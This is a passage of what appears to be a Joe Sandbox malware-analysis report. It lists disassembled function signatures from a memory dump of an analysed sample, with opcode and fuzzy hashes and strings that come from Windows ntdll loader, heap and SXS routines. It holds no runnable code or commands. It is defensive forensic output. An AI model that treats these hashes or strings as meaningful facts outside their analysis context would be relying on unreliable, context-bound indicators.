                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-523794902
                                                                                                                                • Opcode ID: d76624567b41aa34078c58afdac22515029c5382cbd0a9d4ed54a0146bb12a04
                                                                                                                                • Instruction ID: 7fae2bd454486aa276f0c6e9a793a22640de489eab1eb9a5f2b5e20ef62c55ed
                                                                                                                                • Opcode Fuzzy Hash: d76624567b41aa34078c58afdac22515029c5382cbd0a9d4ed54a0146bb12a04
                                                                                                                                • Instruction Fuzzy Hash: 2542D07A219341AFD305CF28C884B6ABBE6FF84348F044A69E4958F351DB74D946CF52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.}5
                                                                                                                                • API String ID: 0-1245041278
                                                                                                                                • Opcode ID: 41abb3c4507c64b1d1db6c7ff9bc2de976c068fc0674492b8512d34cb9110cd6
                                                                                                                                • Instruction ID: 30bfdc6510ca158e6b2edc74208463b6f7111248446c28f1b92bb4916369b9f3
                                                                                                                                • Opcode Fuzzy Hash: 41abb3c4507c64b1d1db6c7ff9bc2de976c068fc0674492b8512d34cb9110cd6
                                                                                                                                • Instruction Fuzzy Hash: 68F12CB6E05219EBDB11CF98C984EDEBBF9FF08790F51405AE905AB210E7719E01CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                • API String ID: 0-122214566
                                                                                                                                • Opcode ID: 9cc63840ea67efae78dac33a5068ac78c06ae4e276103c21f6ccee5f3f520baa
                                                                                                                                • Instruction ID: 31b87744365f7a9262d6527a78c4d1d6f5e5ab6eb61452b744c56b885aa8bafe
                                                                                                                                • Opcode Fuzzy Hash: 9cc63840ea67efae78dac33a5068ac78c06ae4e276103c21f6ccee5f3f520baa
                                                                                                                                • Instruction Fuzzy Hash: 8CC12275A04315ABEB15CB64C889BBEB7B6FF45700F9041A9EC0AAF290DBB4DD44C790
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-792281065
                                                                                                                                • Opcode ID: 295f6d4b943cf8b93a58526f5875a09393715c1c9e6902d66ba9c2138fdeb99f
                                                                                                                                • Instruction ID: 623a0e1ab20d71a75afec2ccca818078d5312453be6472620845124b2b03099e
                                                                                                                                • Opcode Fuzzy Hash: 295f6d4b943cf8b93a58526f5875a09393715c1c9e6902d66ba9c2138fdeb99f
                                                                                                                                • Instruction Fuzzy Hash: D1912675B097549FEB25CF18E844BAA7BB1BB01754F100169E9126F290DFB0AC82CBE1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • LdrpInitializeProcess, xrefs: 357EC5E4
                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 35827FF0
                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 35827F82, 35827FF6
                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 35827F7B
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 35827F8C, 35828000
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 357EC5E3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-475462383
                                                                                                                                • Opcode ID: 9bda00f3ebb4ab776857ba92b49e5db7e305b81d35919deda6e7e6be5d24a0ca
                                                                                                                                • Instruction ID: 2bfc36338c3f8296f5f59196e6ec4ebf89b310ef747557f6409614e0946f0bdb
                                                                                                                                • Opcode Fuzzy Hash: 9bda00f3ebb4ab776857ba92b49e5db7e305b81d35919deda6e7e6be5d24a0ca
                                                                                                                                • Instruction Fuzzy Hash: AA31C5757093419FD314DF29D849E2ABBE5EF84710F014558F985AF391DB20EC05CBA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 35821FC9
                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 35821FA9
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 35821F82
                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 35821F6A, 35821FA4, 35821FC4
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 35821F6F
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 35821F8A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                • API String ID: 0-861424205
                                                                                                                                • Opcode ID: 6f83e74384220c2b77322639eb37f5ef1a1aafaccc55faebb32e863de283450a
                                                                                                                                • Instruction ID: 809eb4d4ddc64069fa3d7bc98eda99dd62b78f72a9737d025c803becbbea6aac
                                                                                                                                • Opcode Fuzzy Hash: 6f83e74384220c2b77322639eb37f5ef1a1aafaccc55faebb32e863de283450a
                                                                                                                                • Instruction Fuzzy Hash: 5B31E2B6B083647FE7108E869C45F9B7B68EF46790F124599B9107B244C770EE418BE1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                • Opcode ID: 14bef559b7de78b070aa3adc9fc1ebc9b49358741a561059a7e9517b6c8fb20f
                                                                                                                                • Instruction ID: aa03555e7d2978534039ed926366ac5536bc52729588ab495ccb36bee87845ab
                                                                                                                                • Opcode Fuzzy Hash: 14bef559b7de78b070aa3adc9fc1ebc9b49358741a561059a7e9517b6c8fb20f
                                                                                                                                • Instruction Fuzzy Hash: A0F16674A01605DFEB05CF68C898F6AB7B6FB44344F1081A9E8169B391DB74EA81CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                • Opcode ID: b6e5d954c9ea239515a0e0066e425afc4080a49e9a25ee83a2e63bc443555c8f
                                                                                                                                • Instruction ID: ed3bf59aa44b3fb09bd88ebd4a00fe86d3753deb5d6d9ec34822d1d7f4f479c4
                                                                                                                                • Opcode Fuzzy Hash: b6e5d954c9ea239515a0e0066e425afc4080a49e9a25ee83a2e63bc443555c8f
                                                                                                                                • Instruction Fuzzy Hash: 0551FD757043019FE714DF38C888F2AB7F2BB88724F14066DE8529F290EB70A841CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 358280E2
                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 358280E9
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 358280F3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                • Opcode ID: 07902f50062085e1800916adcc8ab79c0e5997110cfbfde978df826295bc30ac
                                                                                                                                • Instruction ID: 52daf07b9c16f33d89e50a52a841fb7db9bce5acdc3ffef86988736a43087ec3
                                                                                                                                • Opcode Fuzzy Hash: 07902f50062085e1800916adcc8ab79c0e5997110cfbfde978df826295bc30ac
                                                                                                                                • Instruction Fuzzy Hash: DC41F3B9614300ABD710EF69EC44F5B77F9BF85750F01896AB958AB290EF34E801CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • LdrpCheckRedirection, xrefs: 3583450F
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 35834519
                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 35834508
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                • Opcode ID: feddde78e39d3cbf8455d53f876652f7f0ee30641eb03286c3588fd76964c1a2
                                                                                                                                • Instruction ID: 4a7cbc504d3b0fecccc9cbe8c89d0a66a28e360aae4f2e282eaf4cb8128a3231
                                                                                                                                • Opcode Fuzzy Hash: feddde78e39d3cbf8455d53f876652f7f0ee30641eb03286c3588fd76964c1a2
                                                                                                                                • Instruction Fuzzy Hash: 4841D07A607311AFDB11CF58D84AA1677E5BF48650F0506B9EC999B275EB30EC00CBC1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: 671453b97e523f7e032f2bd18679088e33343f13ff40826611e563cadb20e397
                                                                                                                                • Instruction ID: 6327aa62b2f8f6e131dc6c87d420901e9082df4f4115487be8070fad2fc76e5a
                                                                                                                                • Opcode Fuzzy Hash: 671453b97e523f7e032f2bd18679088e33343f13ff40826611e563cadb20e397
                                                                                                                                • Instruction Fuzzy Hash: 00F1D576F006158FCB18CF68C9906BDBBF6EF88250B594169D8A6DB380E774EE41CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                • API String ID: 0-3061284088
                                                                                                                                • Opcode ID: 323c3b608c17d1ef4336a8f0fb06b74dbebb0c156df84fd9f2458b5b2795805d
                                                                                                                                • Instruction ID: 0dfb356ca133648e310ef166c6c999e360c383950de9be40b33817b76db23df6
                                                                                                                                • Opcode Fuzzy Hash: 323c3b608c17d1ef4336a8f0fb06b74dbebb0c156df84fd9f2458b5b2795805d
                                                                                                                                • Instruction Fuzzy Hash: 51014737124290FEE3058728F80DFE67BA4EB81770F26409AE8054FB908FA59C45D960
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 357B0586
                                                                                                                                • kLsE, xrefs: 357B05FE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                • Opcode ID: d2e819d93f7f1b04dfe2c02d09637246e53083b13d29b298b78177cfeaf20b37
                                                                                                                                • Instruction ID: 850e74fda8729e44485b33546227653585f7701704f31d8f22b82245aea825b1
                                                                                                                                • Opcode Fuzzy Hash: d2e819d93f7f1b04dfe2c02d09637246e53083b13d29b298b78177cfeaf20b37
                                                                                                                                • Instruction Fuzzy Hash: CC51D1B5A08746DFEF20DFA6C444AABB7F5BF44300F00443ED5968B640EBB09A05CB61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LUx5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                • API String ID: 0-966721289
                                                                                                                                • Opcode ID: 0e084809e9983e4d1af5f3be1f7173bec9212707b637752221d7df0a391978f6
                                                                                                                                • Instruction ID: 10fa000003e760ec20bc00136cc6efecd560c51317639e459a36e3566662f891
                                                                                                                                • Opcode Fuzzy Hash: 0e084809e9983e4d1af5f3be1f7173bec9212707b637752221d7df0a391978f6
                                                                                                                                • Instruction Fuzzy Hash: 1EB1A875A057048FEB14CF69C894B9EB7B2BF54794F20442AE856EB390DBB0EE40CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • @, xrefs: 357E84B1
                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 357E847E
                                                                                                                                • LdrpInitializeProcess, xrefs: 357E8342
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 357E8341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                • Opcode ID: bb9430d43ed0c1080b65c9876fde49feb879d44185cd9db662d50ef67193343a
                                                                                                                                • Instruction ID: 5d8096bc29fdb26b8fda8925e9bfffdd5a44a33d3817941b0e1cab5f6b70e6bd
                                                                                                                                • Opcode Fuzzy Hash: bb9430d43ed0c1080b65c9876fde49feb879d44185cd9db662d50ef67193343a
                                                                                                                                • Instruction Fuzzy Hash: F7917C71608340AFE721CE60CC44FABBBEDFB85784F40092EFA859A150E735D944CBA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 35821FE3, 358220BB
                                                                                                                                • .Local, xrefs: 357E27F8
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 35821FE8
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 358220C0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                • Opcode ID: e1b7ccfb0328ecad0579744d66936ede2277d917ad3ece3d394914b83201e56e
                                                                                                                                • Instruction ID: e1de93627ffa675d34323fb3a4a41b292a661867cae1657f0e9543fd955d3624
                                                                                                                                • Opcode Fuzzy Hash: e1b7ccfb0328ecad0579744d66936ede2277d917ad3ece3d394914b83201e56e
                                                                                                                                • Instruction Fuzzy Hash: F0A1BC75A0032D9FDB24CF64D888B99B3B6BF58354F5101EAD80AAB251DB709EC1CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LUx5$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                • API String ID: 0-288221560
                                                                                                                                • Opcode ID: a58fa0f8e9338e6a3dee81385513345d1865662987a842cf4abf7e0ae272584d
                                                                                                                                • Instruction ID: f3011f733eeb23c851e22bc033f68a48801f37b2475711bd3e7c9de8db9777f7
                                                                                                                                • Opcode Fuzzy Hash: a58fa0f8e9338e6a3dee81385513345d1865662987a842cf4abf7e0ae272584d
                                                                                                                                • Instruction Fuzzy Hash: 09919975A08349CBEF11CF59C844BADB7B1BF00764F544199EC19AB290DBB89E80CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 35810DEC
                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 35810EB5
                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 35810E72
                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 35810E2F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                • Opcode ID: 863dc06a2b55f6152775404300b8da7da671e7c7fbf4e7dbaa066ab2bdb7ae6d
                                                                                                                                • Instruction ID: e8053fc9f5cc441b768cbc97c17a0019dd85f4a36bdd561f59606f411067b376
                                                                                                                                • Opcode Fuzzy Hash: 863dc06a2b55f6152775404300b8da7da671e7c7fbf4e7dbaa066ab2bdb7ae6d
                                                                                                                                • Instruction Fuzzy Hash: 5571C2B5A08704AFDF60CF15C884F877BA9AF84794F400968F9498B246D775D688CFD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                • API String ID: 0-2586055223
                                                                                                                                • Opcode ID: d01000682f51dc907e6f3c3c15514b20edb55acd97329bbe238237d103750e03
                                                                                                                                • Instruction ID: 8831ae3ca9ae76de557ec7d4373d0b8b03e93573f66b1446cdf73050739e1a56
                                                                                                                                • Opcode Fuzzy Hash: d01000682f51dc907e6f3c3c15514b20edb55acd97329bbe238237d103750e03
                                                                                                                                • Instruction Fuzzy Hash: C061CF7A248780AFE312CA64CC48F6BB7A9FF84790F040599F9648F291DB74D801CB62
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
